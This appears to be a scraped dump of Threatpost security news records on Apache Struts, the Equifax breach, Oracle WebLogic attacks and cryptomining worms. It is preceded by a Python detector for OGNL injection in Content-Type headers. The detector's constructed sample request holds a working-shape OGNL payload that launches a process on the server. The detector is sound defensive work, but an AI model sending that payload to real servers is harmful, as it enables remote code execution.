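def struts_ct_verdict(raw_request: str) -> str:
    """'ognl-in-content-type' for the known payload shape,
    'malformed-content-type' for a header that is not a media type at all,
    'clean' otherwise (including requests with no Content-Type)."""
    content_type = parse_headers(raw_request).get("content-type", "")
    if OGNL_MARKERS.search(content_type):
        return "ognl-in-content-type"
    if content_type and not SANE_CONTENT_TYPE.match(content_type):
        return "malformed-content-type"
    return "clean"


def triage(requests: List[str]) -> Dict[str, int]:
    """Count verdicts over a batch of raw requests."""
    counts: Dict[str, int] = {}
    for request in requests:
        verdict = struts_ct_verdict(request)
        counts[verdict] = counts.get(verdict, 0) + 1
    return counts


# Constructed sample requests (not captured traffic).  The first mimics the
# public exploit shape: an OGNL block where a media type should be.
EXPLOIT_STYLE = (
    "POST /struts2-showcase/index.action HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: %{(#_='multipart/form-data')."
    "(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#cmd='id').(#p=new java.lang.ProcessBuilder(#cmd)).(#p.start())}\r\n"
    "Content-Length: 0\r\n\r\n"
)
BENIGN_UPLOAD = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: multipart/form-data; boundary=----FormBoundary7MA4YWxk\r\n"
    "Content-Length: 0\r\n\r\n"
)
BENIGN_FORM = (
    "POST /login.action HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "user=a&pass=b"
)
MALFORMED = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: multipart/form-data; boundary\r\n\r\n"
)
SAMPLES = [EXPLOIT_STYLE, BENIGN_UPLOAD, BENIGN_FORM, MALFORMED]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(struts_ct_verdict(sample), "<-", sample.splitlines()[2])
    print(triage(SAMPLES))
```

The marker check catches the payload shape the public exploits used; the shape check catches obfuscated variants and anything else that should never reach a multipart parser, at the cost of some noise from broken clients, which is why the two verdicts are kept apart. Either hit on a server that is still running Struts 2.3 before 2.3.32 or 2.5 before 2.5.10.1 is worth treating as an exploitation attempt rather than a scan.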
Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.

Famed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and, as recent IoT issues [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested that the only way to prevent breaches like this from happening again is government intervention.

“By regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,” Schneier wrote. “They can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.”

Fittingly, as if to get the ball rolling, on Wednesday U.S. Sen.
Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company’s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.

“The volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,” [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>). “In ways similar to the financial service industry’s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.”

The letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Sen. Ron Wyden (D-Ore.), sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.

“The scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,” the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.

While the FTC doesn’t typically comment on ongoing investigations, the Commission did confirm Thursday afternoon that, because of the “intense public interest” and “potential impact of this matter,” it was looking into the breach.

Equifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach, but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinians may be implicated as well.
Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden’s employees, native Argentinians, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI – the Argentinian equivalent of a Social Security Number.

The site, according to Holden, “was wide open, protected by perhaps the most easy-to-guess password combination ever: ‘admin/admin.’” Krebs claims the portal was disabled upon notifying Equifax’s attorney and that the company is looking into how it may have been left unsecured.
", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-28T05:48:46", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled.
Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers – who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.

A [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.

The vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team’s Man Yue Mo, who uncovered the flaw.

“This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,” he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday.
“On top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.”

[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts’ behavior.

“On the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,” said Yue Mo, referring to the infamous vulnerability (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).

Tim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.

“In the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,” he explained. “The prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turn requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts.
It is this level of understanding which is of greatest concern – and this concern relates to any library framework.”

## Anatomy of the Flaw

The vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team’s findings.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,” they explained. “The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.”

Because the issue affects the core of Struts, there are at least two separate attack vectors – and potentially many more.

In the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and the postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.

The researchers explained: “An example of a struts.xml configuration that is potentially vulnerable: the <action …> tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.”

The second attack vector has to do with the fact that Struts supports page templates inside <result> tags in the Struts configuration: “The use of URL tags in such pages is potentially unsafe if the template is referred to from an <action> tag that does not provide a namespace attribute (or specifies a wildcard namespace),” the researchers said.
“Your application is vulnerable if the template contains an <s:url …> tag without an action or value attribute.”

Researchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to “true” in the Struts configuration – the default state if the application uses the popular Struts Convention plugin. Also, the application’s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. “/*”).

“This applies to actions and namespaces specified in the Struts configuration file (e.g. <action namespace="main">), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,” they explained.

That said, they also cautioned that other attack vectors may emerge that apply to different configurations.

“Whether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,” the firm said. “Note that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.”

This is a critical point, according to Mackey. “Validating the input to a function requires a clear definition of what is acceptable,” he said. “It equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it’s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued, as it’s unrealistic to assume that all patches are free from behavioral changes.
Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.”

Pavel Avgustinov, vice president of QL Engineering at Semmle, laid out what’s at stake in a media statement: “Critical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,” he said. “A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It’s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.”
", "cvss3": {}, "published": "2018-08-23T16:46:57", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: ‘More Critical Than Equifax Bug’", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week’s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.

René Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it’s unclear which vulnerability, if any, was exploited.

[The
letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax’s servers was breached via an unnamed Apache Struts flaw.

The report, penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co., did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.

Gielen’s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans’ records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) – since edited – initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it’s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.

Gielen says the ASF takes “enormous efforts” to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities.
There is no silver bullet for preventing exploits from surfacing in the wild, however.

“Since vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.”

If the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability – something it quickly remedied.

“We were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,” Gielen said. “What we saw here is common software engineering business — people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It’s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.”

Gielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which frameworks/libraries are used in their setup, ensuring that processes to roll out security fixes are established, and perhaps most importantly, understanding that complex software can contain flaws.

An Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.

It’s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework’s REST plugin.
Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts’ Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.

Researchers with Contrast Security posit it’s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the Content-Type header, to hit Equifax.

“The first vulnerability from March seems much more likely because it’s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,” Jeff Williams, Contrast’s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).

Williams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.

“Keeping libraries up to date isn’t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months.
I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,” Williams said.

Equifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.

The company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The move was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.

> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.
> 
> — Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)

The company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.

> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail.
[pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)
> 
> — Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)

The company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company’s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.

The company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn’t waive a consumer’s right to take legal action.

The company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeatedly by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York’s Attorney General, opened a formal investigation into the breach on Friday, calling out the company’s arbitration clause policy.

As expected, multiple lawsuits have been filed against the company in the wake of the breach. One class action suit, filed late Thursday night, alleges Equifax “negligently failed to maintain adequate technological safeguards to protect [the plaintiffs’] information from unauthorized access by hackers.” The suit seeks as much as $70 billion in damages nationally.

“Equifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,” the complaint also reads.

_*This article was updated at 5 p.m.
to include insight from Contrast Security re: CVE-2017-5638 and Equifax._
", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.

All web applications using the framework’s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.

“This particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin.
The weakness is caused by the way Struts deserializes untrusted data,” the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by the Apache Software Foundation (ASF).

“This is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,” said Oege de Moor, CEO and founder of Semmle.

Affected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).

The ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.

“The best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to serve normal pages and JSONs only,” the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).

Semmle cites estimates that the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.

“Organizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader’s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,” Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.

Multiple similar vulnerabilities have been reported tied to Struts.
Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.

[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.

Semmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the process of taking structured data from one format and rebuilding it into an object. The process can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.

The remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.

“Lgtm (Semmle’s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object.
This includes data that comes from an HTTP request or from any other socket connection,” Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.

Data contained in one of the arguments (toObject) should be considered “tainted” and “under the control of a remote user and should not be trusted.” This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. “However, some projects use a slightly different approach to receive remote user input,” they said.

Semmle said it has developed a “simple” working exploit for this vulnerability but currently has no plans to disclose it.

“There is no suggestion that an exploit is publicly available, but it is likely that one will soon be,” van Schaik wrote in a blog post.
", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:47:52", "description": "Malicious activity exploiting the recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) is surging. Even though there’s a patch, tens of thousands of vulnerable machines represent an irresistible target for hackers, according to Unit 42 researchers at Palo Alto Networks – especially since the bug is “trivial” to exploit.

Oracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications.
Oracle released an out-of-band patch on April 26, 2019 – though exploitation for what was then a zero-day had already begun, researchers said. Quickly thereafter, attacks distributing a never-before-seen [ransomware variant called “Sodinokibi” emerged](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>); and then attacks [spreading a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, which is used to launch distributed-denial-of-service (DDoS) and cryptojacking attacks.

Now, other attacks are starting to snowball, with no sign of abating.

“Once the vulnerability was made public with the release of the patch, numerous instances of proof-of-concept (PoC) code exploiting the vulnerability were released,” Unit 42 researchers said, in a posting [late last week](<https://unit42.paloaltonetworks.com/attackers-increasingly-targeting-oracle-weblogic-server-vulnerability-for-xmrig-and-ransomware/>). “Preliminary indicators reveal over 600 exploitation attempts targeting CVE-2019-2725 on Palo Alto Networks soak sites and we expect this number to increase rapidly.”

They added that a scan showed more than 41,000 publicly accessible WebLogic instances in the wild.

“With this many publicly available WebLogic instances on the internet, as well as an unknown number of private instances in enterprise environments, we expect an escalation of exploitation attempts in the coming days and weeks,” according to the researchers.

The critical flaw, which has a CVSS score of 9.8, is a remote code execution bug that is remotely exploitable without authentication. Impacted are versions 10.3.6.0.0 and 12.1.3.0.0 of the product.
Palo Alto pointed out that exploitation does not require any interaction from the user – a remote, unauthenticated user can send an HTTP request containing a crafted SOAP payload and obtain remote code execution trivially.

“People are on the lookout for critical vulnerabilities and seek to jump on them quickly so they can exploit them before patches are applied,” Ryan Olson, vice president of threat intelligence for Unit 42, told Threatpost. “As we outline in the blog, this isn’t a difficult vulnerability to exploit, particularly given its similarity to a previous vulnerability from 2017.”

That previous vulnerability (CVE-2017-10271) allows a remote, unauthenticated attacker to pass Java-class objects with arbitrary contents, allowing for remote code-execution, and in many ways provides a blueprint for the new flaw, according to the researchers.

“This reinforces the importance of good testing for variant vulnerabilities by vendors when patching vulnerabilities,” Olson told Threatpost.

## XMRig and GandCrab

Unit 42 researchers have observed a wide variety of payloads in addition to Muhstik and Sodinokibi, such as a PowerShell loader that fetches the open-source Monero cryptominer known as XMRig.
In addition to dropping the miner, it terminates any legitimate Oracle update services that would patch the underlying WebLogic vulnerability, and establishes persistence by copying itself and creating a scheduled task that masquerades as the Oracle update service.

Other attacks are pushing ransomware to infected victims, including [the infamous GandCrab](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>).

“At this point, it appears that both ransomware and cryptomining have settled into a stable pattern in terms of use by cybercriminals,” Olson told Threatpost.

The popularity of WebLogic Server, combined with its tendency to be deployed in business-critical environments, creates an attractive target set for cybercriminals; and exacerbating matters is the fact that there could be “an unknown number of private instances in enterprise environments,” Unit 42 researchers said. These are not directly exposed to the web, but an attacker that’s able to penetrate a corporate network could easily uncover them.

“These would essentially be internal network deployments,” Olson said.
“The attacks wouldn’t be different, but the attackers would have to find a means to launch the attack so that it gets into the internal network.”

Businesses should make every effort to patch, and patch quickly, Olson noted.

“This is a reminder that the window for exploitation has narrowed and that enterprises need to be able to deploy critical patches like this in a matter of hours and days, not weeks and months,” he told Threatpost.

**Record:** Threatpost (info), "Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig", published 2019-05-06T20:04:55, modified 2019-05-06T20:04:55. CVEs: CVE-2017-10271, CVE-2019-2725. CVSS score 7.5, vector AV:N/AC:L/Au:N/C:P/I:P/A:P. Id THREATPOST:760547BA8017A91CB7219FE7629E28B3, https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/

**Next record:** Threatpost, last seen 2020-10-14T22:23:27.

A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.

The malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching for and infecting other vulnerable machines.
Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.

According to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls “Golang,” originally targeted only Linux machines, but now has spread to Windows and other servers.

“This new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL,” explained the researchers. They added, “While the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China.”

The bad code also uses various older vulnerability exploits in order to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for ElasticSearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. “[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)”; and CVE-2018-20062 for the ThinkPHP framework.

Other exploits that don’t have CVEs are also used to exploit Hadoop, Redis and MSSQL. In the latter two cases, the malware will first try to mount a dictionary/brute-forcing attack to find credentials, and, if successful, it will use a known method for achieving remote code-execution “by dumping the db file into cron path,” according to Barracuda.

“Some of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China,” according to the report.
“As in other families of malwares, it is safe to assume that this malware will keep evolving, employing more and more exploits.”

## A Golang Malware

Notably, the malware is written in the Go language (Golang).

Golang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others, as the functions imported from other libraries are compiled into the binary itself. It also has a unique way of calling functions and storing symbols and data.

“Although the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware,” according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.

## Under the Hood

Once the malware infects a machine, it downloads a set of files that are customized based on the platform it is attacking. One of those files positions the malware for doing more damage than simply installing a cryptominer.

The file sets typically include the initial loader payload, an update script, a cryptominer and its configuration file, a watchdog, a scanner and a config file for the cryptominer, Barracuda noted.

Out of these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.

“If it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account,” explained the researchers.

The scanner file meanwhile is the malware’s worm propagation mechanism.
It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports back to the C2 about the success.

For Windows machines, the malware also adds a backdoor user, researchers found – essentially just adding another user to the system. An init/update script accomplishes this on the Linux side, according to the analysis, by adding an authorized SSH key to the system.

“Although the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators,” Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Threatpost. “This can be used for deploying additional attacks on the victim’s machine and network, beyond the scope of cryptomining.”

He added, “The cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future.”

**Record:** Threatpost (info), "Golang Worm Widens Scope to Windows, Adds Payload Capacity", published 2020-06-25T18:30:59, modified 2020-06-25T18:30:59. CVEs: CVE-2014-3120, CVE-2015-1427, CVE-2017-10271, CVE-2018-20062, CVE-2018-7600, CVE-2020-5135. CVSS score 7.5, vector AV:N/AC:L/Au:N/C:P/I:P/A:P. Id THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7, https://threatpost.com/worm-golang-malware-windows-payloads/156924/

**Next record:** Threatpost, last seen 2019-11-04T07:14:14.

LAS VEGAS — A backdoor trojan dubbed “SpeakUp” has been spotted exploiting the Linux servers that run more than 90 percent of the top 1 million domains in the U.S. It uses a complex bag of tricks to infect hosts and to propagate, which analysts say could indicate that it’s poised for a major offensive involving a vast number of infected hosts, potentially worldwide.

According to Check Point research released Monday at the CPX360 event in Las Vegas, SpeakUp (so-named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a cryptomining campaign that is gaining momentum and has targeted more than 70,000 servers worldwide so far, in what could be the foundation for a very formidable botnet.

SpeakUp targets on-premises servers as well as cloud-based machines, such as those hosted by Amazon Web Services; and it doesn’t stop at Linux: It also has the ability to infect MacOS devices.

Oded Vanunu, head of products vulnerability research for Check Point, told Threatpost that the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss.
